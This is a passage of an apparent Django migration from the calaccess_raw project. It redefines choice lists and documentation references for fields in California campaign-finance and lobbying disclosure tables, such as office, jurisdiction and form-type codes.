field=calaccess_raw.fields.CharField(blank=True, choices=[('APP', 'State Appellate Court Justice'), ('ASM', 'State Assembly Person'), ('ASR', 'Assessor'), ('ATT', 'Attorney General'), ('BED', 'Board of Education'), ('BOE', 'Board of Equalization Member'), ('BSU', 'Board of Supervisors'), ('CAT', 'City Attorney'), ('CCB', 'Community College Board'), ('CCM', 'City Council Member'), ('CON', 'State Controller'), ('COU', 'County Counsel'), ('CSU', 'County Supervisor'), ('CTR', 'Local Controller'), ('DAT', 'District Attorney'), ('GOV', 'Governor'), ('INS', 'Insurance Commissioner'), ('LTG', 'Lieutenant Governor'), ('MAY', 'Mayor'), ('OTH', 'Other'), ('PDR', 'Public Defender'), ('PER', 'Public Employees Retirement System'), ('PLN', 'Planning Commissioner'), ('SCJ', 'Superior Court Judge'), ('SEN', 'State Senator'), ('SHC', 'Sheriff-Coroner'), ('SOS', 'Secretary of State'), ('SPM', 'Supreme Court Justice'), ('SUP', 'Superintendent of Public Instruction'), ('TRE', 'State Treasurer'), ('TRS', 'Local Treasurer'), ('asm', 'State Assembly Person'), ('gov', 'Governor'), ('OTh', 'Other'), ('oth', 'Other'), ('csu', 'County Supervisor'), ('H', 'Unknown'), ('HOU', 'Unknown'), ('ASS', 'Unknown')], db_column='OFFICE_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=10), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=12), calaccess_raw.annotations.DocumentCloud(id='2712032-Cal-Errata-201', start_page=2)], help_text='Identifies the office being sought', max_length=3, verbose_name='office code'),
),
migrations.AlterField(
model_name='rcptcd',
name='rec_type',
field=calaccess_raw.fields.CharField(choices=[('E530', 'Electronic Form 530: Electronic Issue Advocacy Report'), ('RCPT', 'Receipt')], db_column='REC_TYPE', db_index=True, documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2711616-MapCalFormat2Fields', start_page=71), calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=37), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=29)], help_text='Record Type Value: CVR', max_length=4, verbose_name='record type'),
),
migrations.AlterField(
model_name='rcptcd',
name='sup_opp_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('S', 'SUPPORT'), ('O', 'OPPOSITION'), ('F', 'Unknown')], db_column='SUP_OPP_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2711616-MapCalFormat2Fields', start_page=74), calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=30), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=40)], help_text='Support or opposition code', max_length=1),
),
migrations.AlterField(
model_name='receivedfilingscd',
name='form_id',
field=calaccess_raw.fields.CharField(blank=True, choices=[('F400', 'Form 400: Statement of Organization (Slate Mailer Organization)'), ('F401', 'Form 401: Campaign Disclosure Statement (Slate Mailer Organization)'), ('F402', 'Form 402: Statement of Termination (Slate Mailer Organization)'), ('F410', 'Form 410: Statement of Organization (Recipient Committee)'), ('F425', 'Form 425: Semi-Annual Statement of No Activity (Recipient Committee)'), ('F450', 'Form 450: Campaign Disclosure Statement, Short Form (Recipient Committee)'), ('F460', 'Form 460: Campaign Disclosure Statement (Recipient Committee)'), ('F461', 'Form 461: Campaign Disclosure Statement (Independent Expenditure Committee & Major Donor Committee)'), ('F465', 'Form 465: Supplemental Independent Expenditure Report'), ('F496', 'Form 496: Late Independent Expenditure Report'), ('F497', 'Form 497: Late Contribution Report'), ('F498', 'Form 498: Late Payment Report (Slate Mailer Organization)'), ('F601', 'Form 601: Lobbying Firm Registration Statement'), ('F602', 'Form 602: Lobbying Firm Activity Authorization'), ('F603', 'Form 603: Lobbyist Employer or Lobbying Coalition Registration Statement'), ('F604', 'Form 604: Lobbyist Certification Statement'), ('F606', 'Form 606: Notice of Termination'), ('F607', 'Form 607: Notice of Withdrawal'), ('F615', 'Form 615: Lobbyist Report'), ('F625', 'Form 625: Report of Lobbying Firm'), ('F635', 'Form 635: Report of Lobbyist Employer or Report of Lobbying Coalition'), ('F645', 'Form 645: Report of Person Spending $5,000 or More')], db_column='FORM_ID', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(end_page=8, id='2711624-Overview', start_page=4)], help_text='Form identification code', max_length=7, verbose_name='form identification code'),
),
migrations.AlterField(
model_name='s401cd',
name='form_type',
field=calaccess_raw.fields.CharField(blank=True, choices=[('F401B', 'Form 401 (Campaign Disclosure Statement (Slate Mailer Organization)): Schedule B, Payments Made'), ('F401B-1', 'Form 401 (Campaign Disclosure Statement (Slate Mailer Organization)): Schedule B-1, Payments Made by Agent or Independent Contractor'), ('F401C', 'Form 401 (Campaign Disclosure Statement (Slate Mailer Organization)): Schedule C, Persons Receiving $1,000 or More'), ('F401D', 'Form 401 (Campaign Disclosure Statement (Slate Mailer Organization)): Schedule D, Candidates and Measures Not Listed on Schedule A')], db_column='FORM_TYPE', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=39), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=51)], help_text='Name of the source filing form or schedule', max_length=7),
),
migrations.AlterField(
model_name='s401cd',
name='juris_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('ASM', 'Assembly District'), ('BOE', 'Board of Equalization District'), ('CIT', 'City'), ('CTY', 'County'), ('LOC', 'Local'), ('OTH', 'Other'), ('SEN', 'Senate District'), ('STW', 'Statewide'), ('SAC', 'Unknown'), ('CT', 'Unknown'), ('ca', 'Unknown'), ('CAL', 'Unknown'), ('OR', 'Unknown'), ('AL', 'Unknown'), ('CA', 'Unknown'), ('10', 'Unknown')], db_column='JURIS_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2711616-MapCalFormat2Fields', start_page=77), calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=39), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=52)], help_text='Office jurisdiction code', max_length=3),
),
migrations.AlterField(
model_name='s401cd',
name='off_s_h_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('S', 'SOUGHT'), ('H', 'HELD')], db_column='OFF_S_H_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=39), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=52)], help_text='Office is sought or held code', max_length=1),
),
migrations.AlterField(
model_name='s401cd',
name='office_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('APP', 'State Appellate Court Justice'), ('ASM', 'State Assembly Person'), ('ASR', 'Assessor'), ('ATT', 'Attorney General'), ('BED', 'Board of Education'), ('BOE', 'Board of Equalization Member'), ('BSU', 'Board of Supervisors'), ('CAT', 'City Attorney'), ('CCB', 'Community College Board'), ('CCM', 'City Council Member'), ('CON', 'State Controller'), ('COU', 'County Counsel'), ('CSU', 'County Supervisor'), ('CTR', 'Local Controller'), ('DAT', 'District Attorney'), ('GOV', 'Governor'), ('INS', 'Insurance Commissioner'), ('LTG', 'Lieutenant Governor'), ('MAY', 'Mayor'), ('OTH', 'Other'), ('PDR', 'Public Defender'), ('PER', 'Public Employees Retirement System'), ('PLN', 'Planning Commissioner'), ('SCJ', 'Superior Court Judge'), ('SEN', 'State Senator'), ('SHC', 'Sheriff-Coroner'), ('SOS', 'Secretary of State'), ('SPM', 'Supreme Court Justice'), ('SUP', 'Superintendent of Public Instruction'), ('TRE', 'State Treasurer'), ('TRS', 'Local Treasurer'), ('asm', 'State Assembly Person'), ('ltg', 'Lieutenant Governor'), ('OTh', 'Other'), ('att', 'Attorney General'), ('oth', 'Other'), ('tre', 'State Treasurer'), ('con', 'State Controller'), ('boe', 'Board of Equalization Member'), ('sos', 'Secretary of State'), ('sup', 'Superintendent of Public Instruction'), ('H', 'Unknown')], db_column='OFFICE_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=10), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=12), calaccess_raw.annotations.DocumentCloud(id='2712032-Cal-Errata-201', start_page=2)], help_text='Identifies the office being sought', max_length=3, verbose_name='office code'),
),
migrations.AlterField(
model_name='s401cd',
name='sup_opp_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('S', 'SUPPORT'), ('O', 'OPPOSITION')], db_column='SUP_OPP_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=39), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=52)], help_text='Support or opposition code', max_length=1),
),
migrations.AlterField(
model_name='s496cd',
name='form_type',
field=calaccess_raw.fields.CharField(blank=True, choices=[('F496', 'Form 496: Late Independent Expenditure Report')], db_column='FORM_TYPE', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=40), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=53)], help_text='Name of the source filing form or schedule', max_length=4),
),
migrations.AlterField(
model_name='s497cd',
name='entity_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('BNM', "Ballot measure's name/title"), ('CAO', 'Candidate/officeholder'), ('CTL', 'Controlled committee'), ('COM', 'Committee'), ('com', 'Committee'), ('IND', 'Individual'), ('OFF', 'Officer'), ('OTH', 'Other'), ('PTY', 'Political Party'), ('RCP', 'Recipient committee'), ('SCC', 'Small Contributor Committee'), ('0', 'Unknown')], db_column='ENTITY_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(end_page=9, id='2712033-Cal-Format-1-05-02', start_page=8), calaccess_raw.annotations.DocumentCloud(end_page=11, id='2712034-Cal-Format-201', start_page=9), calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=41), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=54)], help_text='Entity Code describing the Contributor/Recipient', max_length=3, verbose_name='entity code'),
),
migrations.AlterField(
model_name='s497cd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('F497P1', 'Form 497 (Late Contribution Report): Part 1, Contributions Received'), ('F497P2', 'Form 497 (Late Contribution Report): Part 2, Contributions Made')], db_column='FORM_TYPE', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=41), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=54)], help_text='Name of the source filing form or schedule', max_length=6),
),
migrations.AlterField(
model_name='s497cd',
name='juris_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('ASM', 'Assembly District'), ('BOE', 'Board of Equalization District'), ('CIT', 'City'), ('CTY', 'County'), ('LOC', 'Local'), ('OTH', 'Other'), ('SEN', 'Senate District'), ('STW', 'Statewide'), ('asm', 'Assembly District'), ('sen', 'Senate District'), ('cit', 'City'), ('GOV', 'Statewide'), ('MAY', 'City'), ('BSU', 'County'), ('CSU', 'County'), ('SUP', 'Statewide'), ('BED', 'Other'), ('CCB', 'Other'), ('CCM', 'Other'), ('CLB', 'Other'), ('IRV', 'City'), ('Fon', 'City'), ('JRS', 'Statewide'), ('CO', 'County'), ('Riv', 'County'), ('SNE', 'Senate District'), ('83', 'Statewide'), ('PER', 'Unknown'), ('FED', 'Unknown'), ('CA', 'Unknown'), ('JR', 'Unknown')], db_column='JURIS_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=42), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=55)], help_text='Jurisdiction code describing the office being sought', max_length=3, verbose_name='jurisdiction code'),
),
migrations.AlterField(
model_name='s497cd',
name='off_s_h_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('H', 'HELD'), ('S', 'SOUGHT'), ('s', 'SOUGHT'), ('h', 'HELD'), ('F', 'UNKNOWN'), ('T', 'UNKNOWN')], db_column='OFF_S_H_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=42), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=55)], help_text='Office is sought or held code', max_length=1),
),
migrations.AlterField(
model_name='s497cd',
name='office_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('APP', 'State Appellate Court Justice'), ('ASM', 'State Assembly Person'), ('ASR', 'Assessor'), ('ATT', 'Attorney General'), ('BED', 'Board of Education'), ('BOE', 'Board of Equalization Member'), ('BSU', 'Board of Supervisors'), ('CAT', 'City Attorney'), ('CCB', 'Community College Board'), ('CCM', 'City Council Member'), ('CON', 'State Controller'), ('COU', 'County Counsel'), ('CSU', 'County Supervisor'), ('CTR', 'Local Controller'), ('DAT', 'District Attorney'), ('GOV', 'Governor'), ('INS', 'Insurance Commissioner'), ('LTG', 'Lieutenant Governor'), ('MAY', 'Mayor'), ('OTH', 'Other'), ('PDR', 'Public Defender'), ('PER', 'Public Employees Retirement System'), ('PLN', 'Planning Commissioner'), ('SCJ', 'Superior Court Judge'), ('SEN', 'State Senator'), ('SHC', 'Sheriff-Coroner'), ('SOS', 'Secretary of State'), ('SPM', 'Supreme Court Justice'), ('SUP', 'Superintendent of Public Instruction'), ('TRE', 'State Treasurer'), ('TRS', 'Local Treasurer'), ('asm', 'State Assembly Person'), ('sen', 'State Senator'), ('Asm', 'State Assembly Person'), ('May', 'Mayor'), ('ASm', 'State Assembly Person'), ('oth', 'Other'), ('csu', 'County Supervisor'), ('Oth', 'Other'), ('H', 'Unknown'), ('S', 'Unknown'), ('OF', 'Unknown'), ('HOU', 'Unknown'), ('LOC', 'Unknown'), ('LEG', 'Unknown'), ('STW', 'Unknown'), ('P', 'Unknown'), ('LTV', 'Unknown'), ('LT', 'Unknown'), ('CTY', 'Unknown'), ('OFF', 'Unknown'), ('REP', 'Unknown'), ('COM', 'Unknown'), ('N/A', 'Unknown')], db_column='OFFICE_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=10), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=12), calaccess_raw.annotations.DocumentCloud(id='2712032-Cal-Errata-201', start_page=2)], help_text='Identifies the office being sought', max_length=3, verbose_name='office code'),
),
migrations.AlterField(
model_name='s497cd',
name='sup_opp_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('O', 'OPPOSITION'), ('S', 'SUPPORT')], db_column='SUP_OPP_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2711616-MapCalFormat2Fields', start_page=82)], help_text='Support or opposition code', max_length=1),
),
migrations.AlterField(
model_name='s498cd',
name='entity_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('CAO', 'Candidate/officeholder'), ('COM', 'Committee'), ('IND', 'Individual'), ('OTH', 'Other'), ('RCP', 'Recipient committee')], db_column='ENTITY_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(end_page=9, id='2712033-Cal-Format-1-05-02', start_page=8), calaccess_raw.annotations.DocumentCloud(end_page=11, id='2712034-Cal-Format-201', start_page=9), calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=43), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=56)], help_text='Entity code', max_length=3, verbose_name='entity code'),
),
migrations.AlterField(
model_name='s498cd',
name='form_type',
field=calaccess_raw.fields.CharField(blank=True, choices=[('F498-A', 'Form 498 (Late Payment Report (Slate Mailer Organization)): Part A, Late Payments Attributed To'), ('F498-R', 'Form 498 (Late Payment Report (Slate Mailer Organization)): Part R, Late Payments Received From')], db_column='FORM_TYPE', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=43), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=56)], help_text='Name of the source filing form or schedule', max_length=9),
),
migrations.AlterField(
model_name='s498cd',
name='juris_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('ASM', 'Assembly District'), ('BOE', 'Board of Equalization District'), ('CIT', 'City'), ('CTY', 'County'), ('LOC', 'Local'), ('OTH', 'Other'), ('SEN', 'Senate District'), ('STW', 'Statewide'), ('GOV', 'Statewide'), ('COU', 'County')], db_column='JURIS_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=43), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=57)], help_text='Office jurisdiction code', max_length=3),
),
migrations.AlterField(
model_name='s498cd',
name='off_s_h_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('H', 'HELD'), ('S', 'SOUGHT')], db_column='OFF_S_H_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=44), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=57)], help_text='Office is sought or held code', max_length=1),
),
migrations.AlterField(
model_name='s498cd',
name='office_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('APP', 'State Appellate Court Justice'), ('ASM', 'State Assembly Person'), ('ASR', 'Assessor'), ('ATT', 'Attorney General'), ('BED', 'Board of Education'), ('BOE', 'Board of Equalization Member'), ('BSU', 'Board of Supervisors'), ('CAT', 'City Attorney'), ('CCB', 'Community College Board'), ('CCM', 'City Council Member'), ('CON', 'State Controller'), ('COU', 'County Counsel'), ('CSU', 'County Supervisor'), ('CTR', 'Local Controller'), ('DAT', 'District Attorney'), ('GOV', 'Governor'), ('INS', 'Insurance Commissioner'), ('LTG', 'Lieutenant Governor'), ('MAY', 'Mayor'), ('OTH', 'Other'), ('PDR', 'Public Defender'), ('PER', 'Public Employees Retirement System'), ('PLN', 'Planning Commissioner'), ('SCJ', 'Superior Court Judge'), ('SEN', 'State Senator'), ('SHC', 'Sheriff-Coroner'), ('SOS', 'Secretary of State'), ('SPM', 'Supreme Court Justice'), ('SUP', 'Superintendent of Public Instruction'), ('TRE', 'State Treasurer'), ('TRS', 'Local Treasurer'), ('gov', 'Governor'), ('oth', 'Other')], db_column='OFFICE_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=10), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=12), calaccess_raw.annotations.DocumentCloud(id='2712032-Cal-Errata-201', start_page=2)], help_text='Identifies the office being sought', max_length=4, verbose_name='office code'),
),
migrations.AlterField(
model_name='s498cd',
name='sup_opp_cd',
field=calaccess_raw.fields.CharField(blank=True, choices=[('O', 'OPPOSITION'), ('S', 'SUPPORT')], db_column='SUP_OPP_CD', documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712033-Cal-Format-1-05-02', start_page=43), calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=57)], help_text='Support or opposition code', max_length=1),
),
migrations.AlterField(
model_name='smrycd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('F401', 'Form 401: Campaign Disclosure Statement (Slate Mailer Organization)'), ('F401A', 'Form 401 (Campaign Disclosure Statement (Slate Mailer Organization)): Schedule A, Payments Received'), ('F401B', 'Form 401 (Campaign Disclosure Statement (Slate Mailer Organization)): Schedule B, Payments Made'), ('F401B-1', 'Form 401 (Campaign Disclosure Statement (Slate Mailer Organization)): Schedule B-1, Payments Made by Agent or Independent Contractor'), ('F450', 'Form 450: Campaign Disclosure Statement, Short Form (Recipient Committee)'), ('F460', 'Form 460: Campaign Disclosure Statement (Recipient Committee)'), ('A', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule A, Monetary Contributions Received'), ('B1', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule B, Part 1, Loans Received'), ('B2', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule B, Part 2, Loan Guarantors'), ('B3', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule B, Part 3, Outstanding Balance'), ('C', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule C, Non-Monetary Contributions Received'), ('D', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule D, Summary of Expenditures Supporting / Opposing Other Candidates, Measures and Committees'), ('E', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule E, Payments Made'), ('F', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule F, Accrued Expenses (Unpaid Bills)'), ('G', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule G, Payments Made by an Agent or Independent Contractor (on Behalf of This Committee)'), ('H', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule H, Loans Made to Others'), ('H1', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule H, Part 1, Loans Made'), ('H2', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule H, Part 2, Repayments Rcvd'), ('H3', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule H, Part 3, Outstanding Loans'), ('I', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule I, Miscellanous increases to cash'), ('F461', 'Form 461: Campaign Disclosure Statement (Independent Expenditure Committee & Major Donor Committee)'), ('F465', 'Form 465: Supplemental Independent Expenditure Report'), ('F625', 'Form 625: Report of Lobbying Firm'), ('F625P2', 'Form 625 (Report of Lobbying Firm): Part 2, Payments Received in Connection with Lobbying Activity'), ('F625P3A', 'Form 625 (Report of Lobbying Firm): Part 3, Payments Made In Connection With Lobbying Activities, Section A, Activity Expenses'), ('F625P3B', 'Form 625 (Report of Lobbying Firm): Part 3, Payments Made In Connection With Lobbying Activities, Section B, Payments Made'), ('F635', 'Form 635: Report of Lobbyist Employer or Report of Lobbying Coalition'), ('F635P3A', 'Form 635 (Report of Lobbyist Employer or Report of Lobbying Coalition): Part 3, Payments Made in Connection with Lobbying Activities, Section A, Payments To In-house Employee Lobbyists'), ('F635P3B', 'Form 635 (Report of Lobbyist Employer or Report of Lobbying Coalition): Part 3, Payments Made in Connection with Lobbying Activities, Section B, Payments To Lobbying Firms'), ('F635P3C', 'Form 635 (Report of Lobbyist Employer or Report of Lobbying Coalition): Part 3, Payments Made in Connection with Lobbying Activities, Section C, Activity Expenses'), ('F635P3D', 'Form 635 (Report of Lobbyist Employer or Report of Lobbying Coalition): Part 3, Payments Made in Connection with Lobbying Activities, Section D, Other Payments to Influence Legislative or Administrative Action'), ('F635P3E', 'Form 635 (Report of Lobbyist Employer or Report of Lobbying Coalition): Part 3, Payments Made in Connection with Lobbying Activities, Section E, Payments in Connection with Administrative Testimony in Ratemaking Proceedings Before The California Public Utilities Commission'), ('S640', 'Schedule 640: Governmental Agencies Reporting (Attachment to Form 635 or Form 645)'), ('F645', 'Form 645: Report of Person Spending $5,000 or More'), ('F645P2A', 'Form 645 (Report of Person Spending $5,000 or More): Part 2, Payments Made this Period, Section A, Activity Expenses'), ('F645P2B', 'Form 645 (Report of Person Spending $5,000 or More): Part 2, Payments Made this Period, Section B, Other Payments to Influence Legislative or Administrative Action'), ('F645P2C', 'Form 645 (Report of Person Spending $5,000 or More): Part 2, Payments Made this Period, Section C, Payments in Connection with Administrative Testimony in Ratemaking Proceedings Before the California Public Utilities Commission'), ('F900', 'Form 900: Campaign Disclosure Statement (Public employee retirement board candidate)'), ('401A', calaccess_raw.annotations.FilingFormSection(db_value='F401A', documentcloud_id=None, end_page=7, form=calaccess_raw.annotations.FilingForm('F401', 'Campaign Disclosure Statement (Slate Mailer Organization)', description='Form 401 is filed by slate mailer organizations to disclose payments made and received in connection with producing slate mailers.', documentcloud_id='2781366-401-2005-01', group='CAMPAIGN'), id='A', start_page=5, title='Schedule A, Payments Received')), ('401B', calaccess_raw.annotations.FilingFormSection(db_value='F401B', documentcloud_id=None, end_page=9, form=calaccess_raw.annotations.FilingForm('F401', 'Campaign Disclosure Statement (Slate Mailer Organization)', description='Form 401 is filed by slate mailer organizations to disclose payments made and received in connection with producing slate mailers.', documentcloud_id='2781366-401-2005-01', group='CAMPAIGN'), id='B', start_page=8, title='Schedule B, Payments Made')), ('401B-1', calaccess_raw.annotations.FilingFormSection(db_value='F401B-1', documentcloud_id=None, end_page=None, form=calaccess_raw.annotations.FilingForm('F401', 'Campaign Disclosure Statement (Slate Mailer Organization)', description='Form 401 is filed by slate mailer organizations to disclose payments made and received in connection with producing slate mailers.', documentcloud_id='2781366-401-2005-01', group='CAMPAIGN'), id='B-1', start_page=10, title='Schedule B-1, Payments Made by Agent or Independent Contractor'))], db_column='FORM_TYPE', db_index=True, documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2711616-MapCalFormat2Fields', start_page=86), calaccess_raw.annotations.DocumentCloud(end_page=28, id='2712033-Cal-Format-1-05-02', start_page=27), calaccess_raw.annotations.DocumentCloud(end_page=60, id='2712033-Cal-Format-1-05-02', start_page=59), calaccess_raw.annotations.DocumentCloud(end_page=37, id='2712034-Cal-Format-201', start_page=36), calaccess_raw.annotations.DocumentCloud(end_page=74, id='2712034-Cal-Format-201', start_page=73)], help_text='Name of the source filing form or schedule', max_length=8),
),
migrations.AlterField(
model_name='spltcd',
name='pform_type',
field=calaccess_raw.fields.CharField(choices=[('A', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule A, Monetary Contributions Received'), ('B1', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule B, Part 1, Loans Received'), ('B2', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule B, Part 2, Loan Guarantors'), ('C', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule C, Non-Monetary Contributions Received'), ('D', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule D, Summary of Expenditures Supporting / Opposing Other Candidates, Measures and Committees'), ('F450P5', 'Form 450 (Campaign Disclosure Statement, Short Form (Recipient Committee)): Part 5, Payments Made'), ('H', 'Form 460 (Campaign Disclosure Statement (Recipient Committee)): Schedule H, Loans Made to Others')], db_column='PFORM_TYPE', db_index=True, documentcloud_pages=[calaccess_raw.annotations.DocumentCloud(id='2712034-Cal-Format-201', start_page=18)], help_text='Parent Schedule Type', max_length=7),
),
migrations.AlterField(
model_name='textmemocd',
name='form_type',
field=calaccess_raw.fields.CharField(choices=[('F401', 'Form 401: Campaign Disclosure Statement (Slate Mailer Organization)'), ('F405', 'Form 405: Amendment to Campaign Disclosure Statement'), ('F410', 'Form 410: Statement of Organization (Recipient Committee)'), ('F425', 'Form 425: Semi-Annual Statement of No Activity (Recipient Committee)'), ('F450', 'Form 450: Campaign Disclosure Statement, Short Form (Recipient Committee)'), ('F460', 'Form 460: Campaign Disclosure Statement (Recipient Committee)'), ('F461', 'Form 461: Campaign Disclosure Statement (Independent Expenditure Committee & Major Donor Committee)'), ('F465', 'Form 465: Supplemental Independent Expenditure Report'), ('F496', 'Form 496: Late Independent Expenditure Report'), ('F497', 'Form 497: Late Contribution Report'), ('F498', 'Form 498: Late Payment Report (Slate Mailer Organization)'), ('F601', 'Form 601: Lobbying Firm Registration Statement'), ('F602', 'Form 602: Lobbying Firm Activity Authorization'), ('F603', 'Form 603: Lobbyist Employer or Lobbying Coalition Registration Statement'), ('F604', 'Form 604: Lobbyist Certification Statement'), ('F605', 'Form 605: Amendment to Registration, Lobbying Firm, Lobbyist Employer, Lobbying Coalition'), ('F606', 'Form 606: Notice of Termination'), ('F607', 'Form 607: Notice of Withdrawal'), ('F615', 'Form 615: Lobbyist Report'), ('F625', 'Form 625: Report of Lobbying Firm'), ('F635', 'Form 635: Report of Lobbyist Employer or Report of Lobbying Coalition'), ('F645', 'Form 645: Report of Person Spending $5,000 or More'), ('S630', 'Schedule 630: Payments Made to Lobbying Coalitions (Attachment to Form 625 or 635) '), ('S635-C', 'Schedule 635C: Payments Received by Lobbying Coalitions'), ('S640', 'Schedule 640: Governmental Agencies Reporting (Attachment to Form 635 or Form 645)'), ('410', 'Form 410: Statement of Organization (Recipient Committee)'), ('460', 'Form 460: Campaign Disclosure Statement (Recipient Committee)'), ('461', 'Form 461: Campaign Disclosure Statement (Independent Expenditure Committee & Major Donor Committee)'), ('465', 'Form 465: Supplemental Independent Expenditure Report'), ('496', 'Form 496: Late Independent Expenditure Report'), ('497', 'Form 497: Late Contribution Report'), ('497P1', 'Form 497 (Late Contribution Report): Part 1, Contributions Received'), ('497P2', 'Form 497 (Late Contribution Report): Part 2, Contributions Made'), ('F401A', 'Form 401 (Campaign Disclosure Statement (Slate Mailer Organization)): Schedule A, Payments Received'), ('F401B', 'Form 401 (Campaign Disclosure Statement (Slate Mailer Organization)): Schedule B, Payments Made'), ('F401B-1', 'Form 401 (Campaign Disclosure Statement (Slate Mailer Organization)): Schedule B-1, Payments Made by Agent or Independent Contractor'), ('F450P5', 'Form 450 (Campaign Disclosure Statement, Short Form (Recipient Committee)): Part 5, Payments Made'), ('F461P1', 'Form 461 (Campaign Disclosure Statement (Independent Expenditure Committee & Major Donor Committee)): Part 1, Name and Address of Filer'), ('F461P2', 'Form 461 (Campaign Disclosure Statement (Independent Expenditure Committee & Major Donor Committee)): Part 2, Nature and Interests of Filer'), ('F461P5', 'Form 461 (Campaign Disclosure Statement (Independent Expenditure Committee & Major Donor Committee)): Part 5, Contributions (Including Loans, Forgiveness of Loans, and LoanGuarantees) and Expenditures Made'), ('F465P3', 'Form 465 (Supplemental Independent Expenditure Report): Part 3, Independent Expenditures Made'), ('F496P3', 'Form 496 (Late Independent 